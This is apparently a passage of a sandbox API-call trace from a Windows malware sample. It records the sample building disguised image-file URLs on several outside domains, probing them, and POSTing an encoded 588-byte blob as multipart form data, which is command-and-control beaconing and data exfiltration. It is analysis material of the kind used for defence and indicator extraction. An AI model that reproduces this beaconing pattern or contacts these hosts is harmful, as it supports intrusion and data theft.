(lpString="wfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=") returned 588 [0065.353] lstrlenW (lpString="Content-Type: multipart/form-data") returned 33 [0065.353] lstrlenA (lpString="wfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=") returned 588 [0065.353] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0065.353] InternetOpenW (lpszAgent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0065.353] InternetConnectW (hInternet=0xcc0004, lpszServerName="alem.be", nServerPort=0x50, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0065.353] VirtualAlloc (lpAddress=0x0, dwSize=0x2800, flAllocationType=0x3000, flProtect=0x40) returned 0x2f50000 [0065.353] wsprintfW (in: param_1=0x2f50000, param_2="%s" | out: param_1="news/graphic/zuru.png") returned 21 [0065.353] HttpOpenRequestW (hConnect=0xcc0008, lpszVerb="POST", lpszObjectName="news/graphic/zuru.png", lpszVersion="HTTP/1.1", lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x8404f700, dwContext=0x0) returned 0xcc000c [0065.353] HttpSendRequestW (in: hRequest=0xcc000c, lpszHeaders="Content-Type: multipart/form-data", dwHeadersLength=0x21, lpOptional=0x2f40000*, dwOptionalLength=0x24c | out: lpOptional=0x2f40000*) returned 1 [0065.485] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0065.485] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0065.485] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0065.485] VirtualFree (lpAddress=0x2f40000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0065.486] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0065.486] wsprintfW (in: param_1=0x2e8f2c0, param_2="http://%s" | out: param_1="http://boatshowradio.com") returned 24 [0065.486] lstrcpyW (in: lpString1=0x2e8d880, lpString2="data" | out: lpString1="data") returned="data" [0065.486] lstrcpyW (in: lpString1=0x2e8da80, lpString2="pics" | out: lpString1="pics") returned="pics" [0065.486] lstrcpyW (in: lpString1=0x2e8dc80, lpString2="es" | out: lpString1="es") returned="es" [0065.486] lstrcatW (in: lpString1="es", lpString2="he" | out: lpString1="eshe") returned="eshe" [0065.486] lstrcpyW (in: lpString1=0x2e8de80, lpString2="jpg" | out: lpString1="jpg") returned="jpg" [0065.486] wsprintfW (in: param_1=0x2e8e080, param_2="%s/%s/%s/%s.%s" | out: param_1="http://boatshowradio.com/data/pics/eshe.jpg") returned 43 [0065.486] lstrlenW (lpString="http://boatshowradio.com/data/pics/eshe.jpg") returned 43 [0065.486] lstrcpyW (in: lpString1=0x2e8d618, lpString2="data/pics/eshe.jpg" | out: lpString1="data/pics/eshe.jpg") returned="data/pics/eshe.jpg" [0065.486] InternetOpenW (lpszAgent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0065.486] InternetOpenW (lpszAgent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0008 [0065.486] InternetConnectW (hInternet=0xcc0008, lpszServerName="boatshowradio.com", nServerPort=0x50, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc000c [0065.486] wsprintfW (in: param_1=0x2e8c760, param_2="/" | out: param_1="/") returned 1 [0065.486] HttpOpenRequestW (hConnect=0xcc000c, lpszVerb="GET", lpszObjectName="/", lpszVersion="HTTP/1.1", lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x8424f700, dwContext=0x0) returned 0xcc0010 [0065.486] HttpSendRequestW (in: hRequest=0xcc0010, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0 | out: lpOptional=0x0*) returned 1 [0066.004] HttpQueryInfoA (in: hRequest=0xcc0010, dwInfoLevel=0x13, lpBuffer=0x2e8cf60, lpdwBufferLength=0x2e8d36c, lpdwIndex=0x2e8d364*=0x0 | out: lpBuffer=0x2e8cf60*, lpdwBufferLength=0x2e8d36c*=0x3, lpdwIndex=0x2e8d364*=0x0) returned 1 [0066.004] lstrcmpiA (lpString1="20x", lpString2="30x") returned -1 [0066.004] InternetCloseHandle (hInternet=0xcc0010) returned 1 [0066.005] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0066.005] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0066.006] VirtualAlloc (lpAddress=0x0, dwSize=0x24d, flAllocationType=0x3000, flProtect=0x4) returned 0x2f40000 [0066.006] lstrlenA (lpString="wfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=") returned 588 [0066.006] lstrlenW (lpString="Content-Type: multipart/form-data") returned 33 [0066.006] lstrlenA (lpString="wfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=") returned 588 [0066.006] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0066.006] InternetOpenW (lpszAgent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0066.006] InternetConnectW (hInternet=0xcc0004, lpszServerName="boatshowradio.com", nServerPort=0x50, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0066.006] VirtualAlloc (lpAddress=0x0, dwSize=0x2800, flAllocationType=0x3000, flProtect=0x40) returned 0x2f50000 [0066.007] wsprintfW (in: param_1=0x2f50000, param_2="%s" | out: param_1="data/pics/eshe.jpg") returned 18 [0066.007] HttpOpenRequestW (hConnect=0xcc0008, lpszVerb="POST", lpszObjectName="data/pics/eshe.jpg", lpszVersion="HTTP/1.1", lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x8404f700, dwContext=0x0) returned 0xcc000c [0066.007] HttpSendRequestW (in: hRequest=0xcc000c, lpszHeaders="Content-Type: multipart/form-data", dwHeadersLength=0x21, lpOptional=0x2f40000*, dwOptionalLength=0x24c | out: lpOptional=0x2f40000*) returned 1 [0066.630] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0066.631] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0066.631] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0066.633] VirtualFree (lpAddress=0x2f40000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0066.633] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0066.633] wsprintfW (in: param_1=0x2e8f2c0, param_2="http://%s" | out: param_1="http://dna-cp.com") returned 17 [0066.633] lstrcpyW (in: lpString1=0x2e8d880, lpString2="news" | out: lpString1="news") returned="news" [0066.633] lstrcpyW (in: lpString1=0x2e8da80, lpString2="image" | out: lpString1="image") returned="image" [0066.633] lstrcpyW (in: lpString1=0x2e8dc80, lpString2="th" | out: lpString1="th") returned="th" [0066.633] lstrcatW (in: lpString1="th", lpString2="th" | out: lpString1="thth") returned="thth" [0066.633] lstrcatW (in: lpString1="thth", lpString2="da" | out: lpString1="ththda") returned="ththda" [0066.633] lstrcpyW (in: lpString1=0x2e8de80, lpString2="gif" | out: lpString1="gif") returned="gif" [0066.633] wsprintfW (in: param_1=0x2e8e080, param_2="%s/%s/%s/%s.%s" | out: param_1="http://dna-cp.com/news/image/ththda.gif") returned 39 [0066.633] lstrlenW (lpString="http://dna-cp.com/news/image/ththda.gif") returned 39 [0066.634] lstrcpyW (in: lpString1=0x2e8d618, lpString2="news/image/ththda.gif" | out: lpString1="news/image/ththda.gif") returned="news/image/ththda.gif" [0066.634] InternetOpenW (lpszAgent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0066.634] InternetOpenW (lpszAgent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0008 [0066.634] InternetConnectW (hInternet=0xcc0008, lpszServerName="dna-cp.com", nServerPort=0x50, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc000c [0066.634] wsprintfW (in: param_1=0x2e8c760, param_2="/" | out: param_1="/") returned 1 [0066.634] HttpOpenRequestW (hConnect=0xcc000c, lpszVerb="GET", lpszObjectName="/", lpszVersion="HTTP/1.1", lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x8424f700, dwContext=0x0) returned 0xcc0010 [0066.634] HttpSendRequestW (in: hRequest=0xcc0010, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0 | out: lpOptional=0x0*) returned 1 [0068.022] HttpQueryInfoA (in: hRequest=0xcc0010, dwInfoLevel=0x13, lpBuffer=0x2e8cf60, lpdwBufferLength=0x2e8d36c, lpdwIndex=0x2e8d364*=0x0 | out: lpBuffer=0x2e8cf60*, lpdwBufferLength=0x2e8d36c*=0x3, lpdwIndex=0x2e8d364*=0x0) returned 1 [0068.022] lstrcmpiA (lpString1="30x", lpString2="30x") returned 0 [0068.022] InternetCloseHandle (hInternet=0xcc0010) returned 1 [0068.023] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0068.023] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0068.023] VirtualAlloc (lpAddress=0x0, dwSize=0x24d, flAllocationType=0x3000, flProtect=0x4) returned 0x2f40000 [0068.024] lstrlenA (lpString="wfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=") returned 588 [0068.024] lstrlenW (lpString="Content-Type: multipart/form-data") returned 33 [0068.024] lstrlenA (lpString="wfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=") returned 588 [0068.024] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0068.024] InternetOpenW (lpszAgent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0068.024] InternetConnectW (hInternet=0xcc0004, lpszServerName="dna-cp.com", nServerPort=0x1bb, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0068.025] VirtualAlloc (lpAddress=0x0, dwSize=0x2800, flAllocationType=0x3000, flProtect=0x40) returned 0x2f50000 [0068.029] wsprintfW (in: param_1=0x2f50000, param_2="%s" | out: param_1="news/image/ththda.gif") returned 21 [0068.029] HttpOpenRequestW (hConnect=0xcc0008, lpszVerb="POST", lpszObjectName="news/image/ththda.gif", lpszVersion="HTTP/1.1", lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x8484f700, dwContext=0x0) returned 0xcc000c [0068.029] HttpSendRequestW (in: hRequest=0xcc000c, lpszHeaders="Content-Type: multipart/form-data", dwHeadersLength=0x21, lpOptional=0x2f40000*, dwOptionalLength=0x24c | out: lpOptional=0x2f40000*) returned 1 [0071.937] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0071.952] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0071.952] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.952] VirtualFree (lpAddress=0x2f40000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.952] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0071.952] wsprintfW (in: param_1=0x2e8f2c0, param_2="http://%s" | out: param_1="http://acbt.fr") returned 14 [0071.953] lstrcpyW (in: lpString1=0x2e8d880, lpString2="includes" | out: lpString1="includes") returned="includes" [0071.953] lstrcpyW (in: lpString1=0x2e8da80, lpString2="images" | out: lpString1="images") returned="images" [0071.953] lstrcpyW (in: lpString1=0x2e8dc80, lpString2="fu" | out: lpString1="fu") returned="fu" [0071.953] lstrcatW (in: lpString1="fu", lpString2="ru" | out: lpString1="furu") returned="furu" [0071.953] lstrcatW (in: lpString1="furu", lpString2="th" | out: lpString1="furuth") returned="furuth" [0071.953] lstrcatW (in: lpString1="furuth", lpString2="he" | out: lpString1="furuthhe") returned="furuthhe" [0071.953] lstrcpyW (in: lpString1=0x2e8de80, lpString2="png" | out: lpString1="png") returned="png" [0071.953] wsprintfW (in: param_1=0x2e8e080, param_2="%s/%s/%s/%s.%s" | out: param_1="http://acbt.fr/includes/images/furuthhe.png") returned 43 [0071.953] lstrlenW (lpString="http://acbt.fr/includes/images/furuthhe.png") returned 43 [0071.953] lstrcpyW (in: lpString1=0x2e8d618, lpString2="includes/images/furuthhe.png" | out: lpString1="includes/images/furuthhe.png") returned="includes/images/furuthhe.png" [0071.954] InternetOpenW (lpszAgent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0071.954] InternetOpenW (lpszAgent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0008 [0071.954] InternetConnectW (hInternet=0xcc0008, lpszServerName="acbt.fr", nServerPort=0x50, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc000c [0071.954] wsprintfW (in: param_1=0x2e8c760, param_2="/" | out: param_1="/") returned 1 [0071.954] HttpOpenRequestW (hConnect=0xcc000c, lpszVerb="GET", lpszObjectName="/", lpszVersion="HTTP/1.1", lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x8424f700, dwContext=0x0) returned 0xcc0010 [0071.954] HttpSendRequestW (in: hRequest=0xcc0010, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0 | out: lpOptional=0x0*) returned 1 [0074.896] HttpQueryInfoA (in: hRequest=0xcc0010, dwInfoLevel=0x13, lpBuffer=0x2e8cf60, lpdwBufferLength=0x2e8d36c, lpdwIndex=0x2e8d364*=0x0 | out: lpBuffer=0x2e8cf60*, lpdwBufferLength=0x2e8d36c*=0x3, lpdwIndex=0x2e8d364*=0x0) returned 1 [0074.897] lstrcmpiA (lpString1="30x", lpString2="30x") returned 0 [0074.897] InternetCloseHandle (hInternet=0xcc0010) returned 1 [0074.897] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0074.897] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0074.897] VirtualAlloc (lpAddress=0x0, dwSize=0x24d, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0074.897] lstrlenA (lpString="wfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=") returned 588 [0074.897] lstrlenW (lpString="Content-Type: multipart/form-data") returned 33 [0074.897] lstrlenA (lpString="wfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=") returned 588 [0074.897] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0074.897] InternetOpenW (lpszAgent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0074.898] InternetConnectW (hInternet=0xcc0004, lpszServerName="acbt.fr", nServerPort=0x1bb, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0074.898] VirtualAlloc (lpAddress=0x0, dwSize=0x2800, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0074.898] wsprintfW (in: param_1=0x3000000, param_2="%s" | out: param_1="includes/images/furuthhe.png") returned 28 [0074.898] HttpOpenRequestW (hConnect=0xcc0008, lpszVerb="POST", lpszObjectName="includes/images/furuthhe.png", lpszVersion="HTTP/1.1", lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x8484f700, dwContext=0x0) returned 0xcc000c [0074.898] HttpSendRequestW (in: hRequest=0xcc000c, lpszHeaders="Content-Type: multipart/form-data", dwHeadersLength=0x21, lpOptional=0x2f50000*, dwOptionalLength=0x24c | out: lpOptional=0x2f50000*) returned 1 [0080.722] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0080.724] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0080.724] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.725] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.725] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0080.725] wsprintfW (in: param_1=0x2e8f2c0, param_2="http://%s" | out: param_1="http://wpakademi.com") returned 20 [0080.725] lstrcpyW (in: lpString1=0x2e8d880, lpString2="content" | out: lpString1="content") returned="content" [0080.725] lstrcpyW (in: lpString1=0x2e8da80, lpString2="images" | out: lpString1="images") returned="images" [0080.725] lstrcpyW (in: lpString1=0x2e8dc80, lpString2="zu" | out: lpString1="zu") returned="zu" [0080.725] lstrcatW (in: lpString1="zu", lpString2="mo" | out: lpString1="zumo") returned="zumo" [0080.725] lstrcatW (in: lpString1="zumo", lpString2="me" | out: lpString1="zumome") returned="zumome" [0080.729] lstrcatW (in: lpString1="zumome", lpString2="ka" | out: lpString1="zumomeka") returned="zumomeka" [0080.729] lstrcpyW (in: lpString1=0x2e8de80, lpString2="bmp" | out: lpString1="bmp") returned="bmp" [0080.729] wsprintfW (in: param_1=0x2e8e080, param_2="%s/%s/%s/%s.%s" | out: param_1="http://wpakademi.com/content/images/zumomeka.bmp") returned 48 [0080.729] lstrlenW (lpString="http://wpakademi.com/content/images/zumomeka.bmp") returned 48 [0080.729] lstrcpyW (in: lpString1=0x2e8d618, lpString2="content/images/zumomeka.bmp" | out: lpString1="content/images/zumomeka.bmp") returned="content/images/zumomeka.bmp" [0080.729] InternetOpenW (lpszAgent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0080.729] InternetOpenW (lpszAgent="Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0008 [0080.729] InternetConnectW (hInternet=0xcc0008, lpszServerName="wpakademi.com", nServerPort=0x50, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc000c [0080.730] wsprintfW (in: param_1=0x2e8c760, param_2="/" | out: param_1="/") returned 1 [0080.730] HttpOpenRequestW (hConnect=0xcc000c, lpszVerb="GET", lpszObjectName="/", lpszVersion="HTTP/1.1", lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x8424f700, dwContext=0x0) returned 0xcc0010 [0080.730] HttpSendRequestW (in: hRequest=0xcc0010, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0 | out: lpOptional=0x0*) returned 1 [0081.361] HttpQueryInfoA (in: hRequest=0xcc0010, dwInfoLevel=0x13, lpBuffer=0x2e8cf60, lpdwBufferLength=0x2e8d36c, lpdwIndex=0x2e8d364*=0x0 | out: lpBuffer=0x2e8cf60*, lpdwBufferLength=0x2e8d36c*=0x3, lpdwIndex=0x2e8d364*=0x0) returned 1 [0081.361] lstrcmpiA (lpString1="20x", lpString2="30x") returned -1 [0081.361] InternetCloseHandle (hInternet=0xcc0010) returned 1 [0081.362] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0081.362] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0081.362] VirtualAlloc (lpAddress=0x0, dwSize=0x24d, flAllocationType=0x3000, flProtect=0x4) returned 0x3000000 [0081.363] lstrlenA 